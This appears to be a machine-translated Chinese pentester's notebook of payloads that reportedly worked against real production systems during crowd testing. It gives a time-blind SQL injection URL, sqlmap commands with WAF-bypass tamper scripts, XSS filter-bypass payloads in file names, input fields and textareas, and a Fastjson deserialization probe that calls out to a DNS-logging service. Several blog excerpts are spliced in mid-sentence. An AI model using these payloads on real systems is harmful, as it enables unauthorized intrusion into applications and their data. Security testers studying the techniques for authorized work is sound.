Preface

// Record the successful small in the real system tips, After all, there is still a big difference between the shooting range and the production environment ,** It is better to travel ten thousand miles than to read ten thousand books **//

0x00、SQL

A crowd test actual battle sql Injection bypass 　　SQL Injection means web The application does not judge or filter the validity of the user's input data , Attackers can web Add extra... At the end of a predefined query statement in the application SQL sentence , Implement illegal operation without the administrator's knowledge , To achieve ——ZAKER, Personalized recommendation of popular news , Local authoritative media information http://app.myzaker.com/news/article.php?pk=6035b5af8e9f09165c74a1ccmysql rlike concat_ Time blind subquery and rlike_ Crazy Liu Laoshi's blog -CSDN Blog sql Injection first try single quotation marks ; When the single quotation mark does not report an error , Try wide byte Injection %df'(--tamper=unmagicquotes)1、 Time blind subquery (SELECT(SLEEP(5)))jHpaPayload: id=1 AND 4301=BENCHMARK(5000000,MD5(0x67426a42))2、rlike Error when using regular matching , Use REGEXP and NOTREGEXP The operator ( or RLIKE and NOTR...https://blog.csdn.net/weixin_29611737/article/details/113910368

One 、 Those successful closures in the system

️http://ip/api/user/query?atSchoolStatus=&current_page=1&department=01'and(select*from(select+sleep(5))a+union+select+1)='&email=212&enabledStatus=&idCardNumber=&idCardType=

Two 、 Those successful in the system sqlmap sentence

//sql Now I have to doubt myself

python sqlmap.py -r 1.txt --time-sec 8 --tamper=space2mysqlblank.py --batch --level 3 -p canshu

sqlmap -r xxx.txt --tamper=space2comment --level 3 --batch

0x01、XSS

Those successful bypass gestures in the system

1、 File attachment

//ps： Front end validation

️<img src=x οnerrοr=confirm(1)>.jpg

2、input label

️”><img src=1 οnerrοr=alert(1)>

3、textarea label

️unicode Code bypass ：

</textarea><img src="x" οnerrοr="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">

️

Bypass pose summary

XSS summary ing_haoaaao The blog of -CSDN Blog xss Pose collection https://blog.csdn.net/haoaaao/article/details/125553450?spm=1001.2014.3001.5501

0x02、 Deserialization

1、Fastjson

// Found in the sending packet fastjson frame , Try .

step ：

（1） Go to https://dig.pm/ Last application dns.

（2）payload：{ {"@type":"java.net.URL","val":"http://dns"}:"summer"}, Replace payload Inside dns, Click on post Contract awarding .

（3） open dig Website “results”, There are loopholes ,results There will be echo .